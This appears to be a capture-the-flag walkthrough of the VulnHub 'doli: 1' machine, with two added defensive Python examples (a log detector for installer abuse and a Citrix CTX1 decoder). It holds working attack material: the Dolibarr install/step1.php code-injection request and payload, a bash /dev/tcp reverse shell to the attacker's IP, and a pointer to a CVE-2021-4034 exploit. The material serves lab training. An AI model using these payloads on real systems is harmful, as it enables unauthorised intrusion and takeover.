VulnHub Machine Walkthrough: Doli: 1
## 0x01 Machine Info
> - **Name**: doli: 1
> - **Release date**: 5 July 2021
> - **Author**: c3p0d4y
> - **Series**: doli
> - **Difficulty**: Hard
> - **Description**: Your boss has asked you to do a quick pentest of their new ERP/CRM software, which was recently installed and modified by a junior developer. Can you find the mistakes the developer made? As far as the web part goes, this machine is based on a real-world engagement.
> - **Download**: https://download.vulnhub.com/doli/doli-vulnhub-fixed.ova
> - **Networking**: DHCP (automatic)
## 0x02 Write-Up
### 2.1 Information Gathering
#### 2.1.1 Host Scan
Target IP: 192.168.181.164
Scan it with nmap:
``` txt
nmap -sS -Pn -p- -A -T4 192.168.181.164
# -sS SYN (stealth) scan, -Pn skip host discovery (no ping), -p- all ports, -A comprehensive scan, -T4 faster timing
```
The scan shows ports 22 and 80 open on the target.
![](https://img-oss.hg021b.org/2024/6/e8d63e628914e80b438a55f4e9d93ac7.png)
Visiting the website shows only the default page, with no other information.
![](https://img-oss.hg021b.org/2024/6/86fbb56669fc54f0681a6841ad099946.png)
#### 2.1.2 Directory Scan with Gobuster
``` txt
gobuster dir -u http://192.168.181.164/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# dir = directory mode, -u target URL, -w wordlist
```
The directory scan returned nothing, so a hostname (virtual host) issue is suspected.
![](https://img-oss.hg021b.org/2024/6/e7dfe9b14f1ed303905c1d1fe604540a.png)
After looking around, it turns out the VulnHub page is missing a hint:
add a doli.thm entry to /etc/hosts (https://tryhackme.com/r/room/doli).
Visiting that site now, however, shows that the room has been hidden.
![](https://img-oss.hg021b.org/2024/6/4f4fafeb7445220941ea677e2e5ff13b.png)
Add the entry to the hosts file.
![](https://img-oss.hg021b.org/2024/6/b1f5be0068d6fe6e6c3612dd7cb8a900.png)
The page still looks the same, so continue brute-forcing.
![](https://img-oss.hg021b.org/2024/6/00dcc08a0add98c1dda12f4c78e0cb5a.png)
#### 2.1.3 Subdomain Brute-Force with Gobuster
``` txt
gobuster vhost -u doli.thm -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --append-domain true
# vhost = virtual host mode, similar to dir enumeration but via the Host header; -w wordlist;
# --append-domain appends the base domain to each wordlist entry (i.e. enumerates subdomain prefixes)
```
This finds erp.doli.thm.
![](https://img-oss.hg021b.org/2024/6/15c120456d0df5e9c119ff2bbeae7d93.png)
Add it to the hosts file and visit it.
![](https://img-oss.hg021b.org/2024/6/efae07b05ceb9d1311e2b80266729633.png)
![](https://img-oss.hg021b.org/2024/6/8d2388dde3f6a303b43c0185c3b3223a.png)
Continue with directory enumeration.
``` txt
gobuster dir -u http://erp.doli.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,asp,md
# dir mode, -u target URL, -w wordlist, -x file extensions to try
```
This time the enumeration returns results; try them one by one.
![](https://img-oss.hg021b.org/2024/6/3ada6dbae9b6ce79df9ed9841859e4fb.png)
Login page (http://erp.doli.thm/document.php)
![](https://img-oss.hg021b.org/2024/6/b49e34ca1940799228ffdaa38a75e8b6.png)
Visit notes.md
![](https://img-oss.hg021b.org/2024/6/c993479c5e927afed110b7f0ccd3313e.png)
``` txt
# ChangeLog
- Changed The Super-Admin Password To A Super Secure Random 15 Chars Passwd (Done)
- Crypt Saved Passwords Locally
- Add Firewall Rules And Allow Only UDP Incoming-Outcoming At Port 9110
- Add a lockfile (To do)
- Revert The Framework's Patch From 7.0.X To Prevent Conflitions With The Mod (To do)
```
From this we learn that the admin password is 15 characters long and the framework version is 7.0.X.
As the author's description says, the web part of the machine is built on a real framework.
Searching for the software description, ERP/CRM, leads to Dolibarr.
![](https://img-oss.hg021b.org/2024/6/ed45462f5267f10fa8688aa9e884a5ed.png)
#### 2.1.4 Exploiting the Dolibarr Framework Vulnerability
Search Kali's local exploit database for related entries:
``` txt
searchsploit dolibarr
```
Two related entries turn up.
![](https://img-oss.hg021b.org/2024/6/9f9dead568df05ddacb71b667f53c413.png)
The second one looks more promising; enumerate the directory it describes:
/install/step1.php
![](https://img-oss.hg021b.org/2024/6/d680f3af73cf49913b0072924cc77c2a.png)
``` txt
# Exploit Title: Unauthenticated Remote Code Evaluation in Dolibarr ERP CRM =<7.0.3
# Date: 06/29/2018
# Exploit Author: om3rcitak - https://omercitak.com
# Vendor Homepage: https://dolibarr.org
# Software Link: https://github.com/Dolibarr/dolibarr
# Version: =<7.0.3
# Tested on: Unix, Windows
## Technical Details
URL: http://{domain}/{dolibarr_path}/install/step1.php
Parameter Name: db_name
Parameter Type: POST
Attack Pattern: x\';system($_GET);//
## Steps to reproduce the behavior
- Go to fresh install page.
- Click "Next Step" button for create example config file (conf/conf.php)
- Send this request:
POST {dolibarr_path}/install/step1.php HTTP/1.1
Host: {domain}
testpost=ok&action=set&main_dir=C%3A%2FAmpps%2Fwww&main_data_dir=C%3A%2FAmpps%2Fwww%2Fdocuments&main_url=http%3A%2F%2Flocalhost+&db_name=x%5C%27%3Bsystem(%24_GET%5Bcmd%5D)%3B%2F%2F&db_type=mysqli&db_host=localhost&db_port=3306&db_prefix=llx_&db_create_database=on&db_user=root&db_pass=root&db_create_user=on&db_user_root=root&db_pass_root=root&selectlang=auto
- Visit url and run the command: `http://{domain}/{dolibarr_path}/install/check.php?cmd=cat /etc/passwd`
## Timeline
- 06/29/2018 18:30 - Found vulnerability.
- 06/29/2018 18:44 - Report vendor.
- 06/29/2018 20:38 - Vulnerability fixed by vendor.
GitHub Issue: https://github.com/Dolibarr/dolibarr/issues/9032
```
Use gobuster to enumerate php files:
``` txt
gobuster dir -u http://erp.doli.thm/install -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
```
A likely directory is found.
![](https://img-oss.hg021b.org/2024/6/284f15442718cb18c8ea1107dd1f9c49.png)
Following the exploit description, the fresh install page is located.
![](https://img-oss.hg021b.org/2024/6/79efeeeea1d5407234b0204c6386138c.png)
Before starting, though, the MySQL service on Kali has to be set up.
``` txt
systemctl start mysqld
# start the MySQL service
```
![](https://img-oss.hg021b.org/2024/6/c5e37544e10dd03cb7975524c595e8b9.png)
Allow root to connect remotely:
``` mysql
use mysql;
-- switch to the mysql database
SELECT User, Password, Host FROM user;
-- list the current account/host access entries
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
-- allow root to access everything from any host, with password root
FLUSH PRIVILEGES;
-- reload the privilege tables
```
![](https://img-oss.hg021b.org/2024/6/293fb7e0521865f442319186a94a1cda.png)
Then start the install configuration.
![](https://img-oss.hg021b.org/2024/6/d59d65b158386b864b0b126caa53651e.png)
Intercept the request with Burp and modify the db_name parameter:
``` txt
db_name=x%5C%27%3Bsystem(%24_GET%5Bcmd%5D)%3B%2F%2F
```
![](https://img-oss.hg021b.org/2024/6/35231d918f3e9fb9bbede1e5cad52d04.png)
![](https://img-oss.hg021b.org/2024/6/4a58cf7c0b474b84d1c07a6c640d1560.png)
Injection succeeded:
``` txt
http://erp.doli.thm/install/Seth.php?cmd=whoami
```
![](https://img-oss.hg021b.org/2024/6/ca40479f7df85a4f0cef4e08d2807096.png)
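The same installer abuse seen from the defending side. The advisory above describes a POST to install/step1.php that writes attacker-controlled text into conf/conf.php, followed by GET requests that hand a cmd parameter to a script in the install directory. The Python below is an added example, not code from this page or from Dolibarr: it parses nginx/Apache combined-format access log lines, scores every request into the installer directory, and reports client IPs that did the step1 POST and then a cmd request, which is the sequence the advisory lays out. The log lines are constructed for the example. The underlying fix is the "Add a lockfile (To do)" item from notes.md: once deployment is done the installer has to be locked (Dolibarr looks for an install.lock file in its documents directory) or the install directory removed, so that step1.php can never be reached again.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines in nginx/Apache combined format (not from the target).
SAMPLE_LOG = """\
192.0.2.10 - - [05/Jul/2021:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Jul/2021:10:00:05 +0000] "GET /install/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Jul/2021:10:00:09 +0000] "POST /install/step1.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.10 - - [05/Jul/2021:10:00:12 +0000] "GET /install/check.php?cmd=whoami HTTP/1.1" 200 64 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Jul/2021:10:01:00 +0000] "GET /document.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Common/combined log format: client, identd, user, [timestamp], "METHOD target PROTO", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return (severity, reason) for requests into the installer directory, else None."""
    path = rec["path"].lower()
    if not path.startswith("/install/"):
        return None
    if "cmd" in rec["query"]:
        # A cmd query parameter on an installer script is the post-exploitation
        # pattern from the advisory (check.php?cmd=...), whatever the file is named.
        return ("critical", "cmd parameter sent to an installer script")
    if rec["method"] == "POST" and path.endswith("/step1.php"):
        return ("high", "POST to install/step1.php (rewrites conf/conf.php)")
    return ("medium", "installer still reachable on a deployed instance")


def scan_log(text):
    """Run classify() over every line; findings keep log order."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hit = classify(rec)
        if hit is not None:
            findings.append({
                "ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                "target": rec["target"], "severity": hit[0], "reason": hit[1],
            })
    return findings


def exploit_chains(findings):
    """Client IPs that POSTed to step1.php and afterwards sent a cmd parameter."""
    posted_step1 = set()
    chains = set()
    for f in findings:
        if f["severity"] == "high":
            posted_step1.add(f["ip"])
        elif f["severity"] == "critical" and f["ip"] in posted_step1:
            chains.add(f["ip"])
    return sorted(chains)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"[{f['severity']}] {f['ip']} {f['method']} {f['target']} - {f['reason']}")
    print("likely install/step1.php exploit chain from:", exploit_chains(found))
```

The medium-severity rule fires on any hit under /install/ because on a deployed instance there is no legitimate reason for that directory to answer at all; if the installer is locked or removed, every line in that class is an alert worth a look on its own.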
#### 2.1.5 Reverse Shell
``` bash
nc -lvvp 5555
# listen on port 5555
```
![](https://img-oss.hg021b.org/2024/6/ce37e6fdaf1e41c46a0c7e90f6dc0a1b.png)
With spaces replaced by '+', the reverse shell connects back:
``` bash
bash+-c+'bash+-i+>%26+/dev/tcp/192.168.181.165/5555+0>%261'
```
![](https://img-oss.hg021b.org/2024/6/b18e2bf44473781713e98031cd97bf84.png)
No sudo-permitted commands were found; three users (c3p0, m3dsec, ybenel) were found under /home.
![](https://img-oss.hg021b.org/2024/6/64d4cfa5df873467f0fb101d0ed7b775.png)
A stewie.el file was found under /opt.
![](https://img-oss.hg021b.org/2024/6/6f959b2ea9309678fdc578cc6fab32d6.png)
``` lisp
(defun main ()
(print "VictoryShallBeMine!"))
(main)
```
This suggests there are other clues in this directory.
Copy the image found there (ViewMe.png) into the install directory and view it in the browser:
``` txt
cp ViewMe.png ~/dolibarr/htdocs/install/1.png
```
![](https://img-oss.hg021b.org/2024/6/d89675b64d3540c3663655dfae50027c.png)
The image reads CITRIX, which is an encoding scheme; this ties in with the notes.md item "Crypt Saved Passwords Locally".
![](https://img-oss.hg021b.org/2024/6/9488d878632f9fdecbb2454bc7b1c1f1.png)
There is a get_secrets file under the playboos directory. Used to fetch the password?
![](https://img-oss.hg021b.org/2024/6/a8eee7bd5746d577f1b40bc66f55c611.png)
Checking the log files, a hidden .bk directory is found under nginx.
![](https://img-oss.hg021b.org/2024/6/fdd26ad35938b4a8ae4072a7f541f278.png)
In access.log.bk there is a long string of hex digits, presumably the password:
``` txt
"GET /5455644852464247526b464a526b4e4254455a435155314752304651516b5a4653554e4453464243526b564a52304e45544564435245314652304a4c5155464754304646526b74425155593d HTTP/1.1"
```
![](https://img-oss.hg021b.org/2024/6/e3130f28ad60cfeddcdf16576231d5d9.png)
#### 2.1.6 Decoding with CyberChef
In CyberChef, the first layer is hex; converting from hex yields a Base64 string.
![](https://img-oss.hg021b.org/2024/6/6fd8c4c671b070ea6f89d042e53f5a60.png)
Decoding the Base64 reveals a Citrix-encoded string.
![](https://img-oss.hg021b.org/2024/6/42870a84678f1b22ad20af0acb4cdde3.png)
Decoding that shows the password: c3p0p4ssw0rd@@
![](https://img-oss.hg021b.org/2024/6/d353d5d1da5e03426156b5d0ff9a984b.png)
Upgrade the shell session and try logging in as the user:
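The three decoding steps above carried out in code, as an added example in Python (not from the page and not CyberChef's code): hex to Base64 to Citrix CTX1, with the CTX1 encoder alongside so the structure of the scheme is visible. The input is the hex string from the access.log.bk request line. The defender's point is the notes.md item "Crypt Saved Passwords Locally": CTX1 takes the UTF-16LE bytes of the password, XORs each with the fixed constant 0xA5 and with the previous output byte, and writes the result as letters A to P. There is no key, so it is a reversible encoding rather than encryption, and a credential "protected" this way and then written into a web-reachable log is simply disclosed.

```python
import base64
import binascii

# Hex string from the page's access.log.bk request line (the GET path without its leading slash).
LOG_HEX = (
    "5455644852464247526b464a526b4e4254455a435155314752304651516b5a46"
    "53554e4453464243526b564a52304e45544564435245314652304a4c51554647"
    "54304646526b74425155593d"
)

# Each output nibble (0-15) becomes one letter; four letters per UTF-16 character.
CTX1_ALPHABET = "ABCDEFGHIJKLMNOP"


def ctx1_encode(plain: str) -> str:
    """Citrix CTX1: XOR every UTF-16LE byte with 0xA5 and with the previous
    output byte (chained), then emit two letters per byte, one per nibble."""
    out = []
    prev = 0
    for b in plain.encode("utf-16-le"):
        prev = b ^ 0xA5 ^ prev
        out.append(CTX1_ALPHABET[prev >> 4])
        out.append(CTX1_ALPHABET[prev & 0xF])
    return "".join(out)


def ctx1_decode(encoded: str) -> str:
    """Invert ctx1_encode. The chaining value is the previous encoded byte and the
    constant is public, so any CTX1 string decodes without knowing any secret."""
    if len(encoded) % 4 != 0 or any(c not in CTX1_ALPHABET for c in encoded):
        raise ValueError("not a CTX1 string (letters A-P, four per character)")
    out = bytearray()
    prev = 0
    for i in range(0, len(encoded), 2):
        cur = (CTX1_ALPHABET.index(encoded[i]) << 4) | CTX1_ALPHABET.index(encoded[i + 1])
        out.append(cur ^ 0xA5 ^ prev)
        prev = cur
    return out.decode("utf-16-le")


def decode_log_token(hex_token: str) -> str:
    """The three-layer recipe from the write-up: hex -> Base64 -> CTX1."""
    layer1 = binascii.unhexlify(hex_token).decode("ascii")            # hex digits -> Base64 text
    layer2 = base64.b64decode(layer1, validate=True).decode("ascii")  # Base64 -> CTX1 letters
    return ctx1_decode(layer2)


if __name__ == "__main__":
    print(decode_log_token(LOG_HEX))  # c3p0p4ssw0rd@@
```

The length check in ctx1_decode (a multiple of four letters, all from A to P) is the same quick test you can apply by eye to decide whether a blob in a log or config file is CTX1 before reaching for a tool.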
``` bash
SHELL=/bin/bash script -q /dev/null
```
#### 2.1.7 Privilege Escalation to User c3p0
Logged in as c3p0 successfully.
![](https://img-oss.hg021b.org/2024/6/233393f9c99bf97b9fa6bd6b0b172275.png)
tnakt.jpg appears to be corrupted, but note.txt in the same directory contains a line:
``` txt
ybenel: i love using a dictionary or multiple dictionaries of words in order to create my passwords
```
![](https://img-oss.hg021b.org/2024/6/4388148e0647be4459bdf9d7d6febc82.png)
#### 2.1.8 Gathering Information with the linpeas Script
No other leads for now.
Upload the linpeas script with nc and run it to see what it finds.
``` bash
nc -l 8888 > linpeas.sh
# on the target: listen on port 8888 and receive linpeas.sh
```
![](https://img-oss.hg021b.org/2024/6/b04729a9a14d8130eb896dc7fc421f0e.png)
``` bash
nc 192.168.181.164 8888 < linpeas.sh
# on Kali: send the file to port 8888 on the target
```
![](https://img-oss.hg021b.org/2024/6/77543edba86b4b6d66e7c7d6b3fbcc0a.png)
Transfer succeeded; make the file executable:
``` bash
chmod +x linpeas.sh
```
![](https://img-oss.hg021b.org/2024/6/bfb9c6b37765aa3a1d488bf978192456.png)
#### 2.1.9 Privilege Escalation via CVE-2021-4034
The scan reports many potential vulnerabilities; since the target has no gcc, try CVE-2021-4034.
![](https://img-oss.hg021b.org/2024/6/2d0b72837b81af20a9de333cb47e289c.png)
``` txt
https://github.com/dadvlingd/CVE-2021-4034
# download the python2 script from this repository
# transfer it with the nc method used earlier and run it
```
Privilege escalation succeeded.
![](https://img-oss.hg021b.org/2024/6/41377a18c6359e77f697c5896770bf64.png)